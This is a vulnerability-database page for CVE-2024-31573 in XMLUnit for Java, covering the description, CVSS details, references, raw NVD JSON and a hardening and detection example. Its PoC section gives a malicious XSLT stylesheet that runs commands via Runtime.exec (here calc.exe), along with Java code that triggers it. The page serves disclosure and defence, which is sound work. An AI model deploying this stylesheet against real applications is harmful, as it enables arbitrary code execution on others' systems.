Security Vulnerability Report
CVE-2024-31573 CVSS 4.0 MEDIUM

CVE-2024-31573

Published: 2025-10-17 19:15:37
Last Modified: 2026-04-15 00:35:42

Description

XMLUnit for Java before 2.10.0, in the default configuration, might allow code execution via an untrusted stylesheet (used for an XSLT transformation), because XSLT extension functions are enabled.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

XMLUnit for Java < 2.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Malicious XSLT stylesheet (the page's PoC, reformatted; the original extraction had mislabelled it as Python):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
 * PoC for CVE-2024-31573
 * XMLUnit for Java XSLT Extension Function Code Execution
 * This malicious XSLT stylesheet exploits enabled XSLT extension functions
 * to execute arbitrary commands via Java Runtime.exec()
-->
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:str="http://xml.apache.org/xalan/java/java.lang.String"
    exclude-result-prefixes="rt str">
  <xsl:template match="/">
    <xsl:variable name="runtime" select="rt:getRuntime()"/>
    <xsl:variable name="command">
      <str:new>calc.exe</str:new>
    </xsl:variable>
    <xsl:variable name="process" select="rt:exec($runtime, $command)"/>
    <result>
      <status>Code execution attempted</status>
      <command><xsl:value-of select="$command"/></command>
    </result>
  </xsl:template>
</xsl:stylesheet>
```

Java code to trigger the vulnerability using XMLUnit (the page's PoC, corrected to the real `org.xmlunit.transform.Transformation` API: the stylesheet is attached with `setStylesheet` and the transformation is run with `transformToString`; the non-existent `org.xmlunit.transform.Transform` import was dropped):

```java
import org.xmlunit.transform.Transformation;
import javax.xml.transform.Source;
import javax.xml.transform.stream.StreamSource;
import java.io.StringReader;

public class XsltExploit {
    public static void main(String[] args) throws Exception {
        // The stylesheet from the block above, supplied as an untrusted string.
        String maliciousXslt = "<!-- above XSLT content -->";
        Source xsltSource = new StreamSource(new StringReader(maliciousXslt));
        Source xmlSource = new StreamSource(new StringReader("<root/>"));

        // XMLUnit before 2.10.0 - extension functions enabled by default,
        // so the library's default TransformerFactory honours rt:exec().
        Transformation transformation = new Transformation(xmlSource);
        transformation.setStylesheet(xsltSource);

        // This will trigger code execution
        transformation.transformToString();
    }
}
```
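The description above says the root cause is that XMLUnit's default configuration left XSLT extension functions enabled. The check a defender wants is a way to confirm that a given `TransformerFactory` really refuses extension calls, and a way to supply a hardened factory on versions before 2.10.0. The following is an added example written for this page, not code from XMLUnit or from the PoC author. It assumes the public `Transformation.setFactory(TransformerFactory)` setter of XMLUnit 2.x and a JAXP transformer (the JDK's XSLTC or Apache Xalan) that disables Java extension functions when `XMLConstants.FEATURE_SECURE_PROCESSING` is set. The probe stylesheet is constructed here and calls only `System.currentTimeMillis()`; it is a detection probe for the misconfiguration, not a payload.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamSource;
import java.io.StringReader;
import org.xmlunit.transform.Transformation;

public class HardenedXslt {

    // Constructed probe stylesheet: one harmless JVM call through the
    // Xalan/XSLTC Java-extension namespace. If it succeeds, extension
    // functions are enabled and an untrusted stylesheet could reach
    // java.lang.Runtime the same way the PoC does.
    static final String PROBE_XSLT =
        "<xsl:stylesheet version=\"1.0\""
        + " xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
        + " xmlns:sys=\"http://xml.apache.org/xalan/java/java.lang.System\">"
        + "<xsl:template match=\"/\">"
        + "<probe><xsl:value-of select=\"sys:currentTimeMillis()\"/></probe>"
        + "</xsl:template></xsl:stylesheet>";

    // Hardened factory: FEATURE_SECURE_PROCESSING turns off Java extension
    // functions in XSLTC and Xalan. The two ACCESS_EXTERNAL_* attributes
    // (JAXP 1.5) additionally block DTD and xsl:import/xsl:include/document()
    // fetches; older non-JDK factories may reject them, hence the catch.
    static TransformerFactory hardenedFactory() throws Exception {
        TransformerFactory f = TransformerFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        try {
            f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            f.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        } catch (IllegalArgumentException unsupportedByThisFactory) {
            // Secure processing alone is what closes the extension-function hole.
        }
        return f;
    }

    // Returns true if the stylesheet's extension call was allowed to run,
    // false if the transformer rejected it. Passing null uses whatever
    // factory the XMLUnit version on the classpath builds by default.
    static boolean extensionFunctionsAllowed(TransformerFactory factory, String xslt) {
        Transformation t = new Transformation(
            new StreamSource(new StringReader("<root/>")));
        t.setStylesheet(new StreamSource(new StringReader(xslt)));
        if (factory != null) {
            t.setFactory(factory); // assumed XMLUnit 2.x API (Transformation.setFactory)
        }
        try {
            t.transformToString();
            return true;
        } catch (Exception blocked) {
            // XMLUnit wraps the JAXP TransformerConfigurationException /
            // TransformerException in its own ConfigurationException /
            // XMLUnitException; either way the extension call did not run.
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Weak: the library default. Prints true on XMLUnit < 2.10.0
        // (the vulnerable configuration), false on 2.10.0 and later.
        System.out.println("default factory allows extension functions: "
            + extensionFunctionsAllowed(null, PROBE_XSLT));

        // Hardened: explicit secure-processing factory, independent of the
        // XMLUnit version in use.
        System.out.println("hardened factory allows extension functions: "
            + extensionFunctionsAllowed(hardenedFactory(), PROBE_XSLT));
    }
}
```

The same probe can be dropped into a unit test that fails when `extensionFunctionsAllowed` returns true for the factory the application actually uses, which catches a dependency downgrade or a code path that forgets to call `setFactory`. Upgrading to XMLUnit 2.10.0 remains the primary fix; the explicit factory is the defence for code that must keep an older version and for any code that also calls JAXP directly.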

References

https://github.com/advisories/GHSA-chfm-68vv-pvw5
https://github.com/xmlunit/xmlunit/commit/b81d48b71dfd2868bdfc30a3e17ff973f32bc15b
https://github.com/xmlunit/xmlunit/issues/264

Raw JSON Data

```json
{"cve": {"id": "CVE-2024-31573", "sourceIdentifier": "[email protected]", "published": "2025-10-17T19:15:36.627", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "XMLUnit for Java before 2.10.0, in the default configuration, might allow code execution via an untrusted stylesheet (used for an XSLT transformation), because XSLT extension functions are enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-669"}]}], "references": [{"url": "https://github.com/advisories/GHSA-chfm-68vv-pvw5", "source": "[email protected]"}, {"url": "https://github.com/xmlunit/xmlunit/commit/b81d48b71dfd2868bdfc30a3e17ff973f32bc15b", "source": "[email protected]"}, {"url": "https://github.com/xmlunit/xmlunit/issues/264", "source": "[email protected]"}, {"url": "https://github.com/xmlunit/xmlunit/issues/264", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```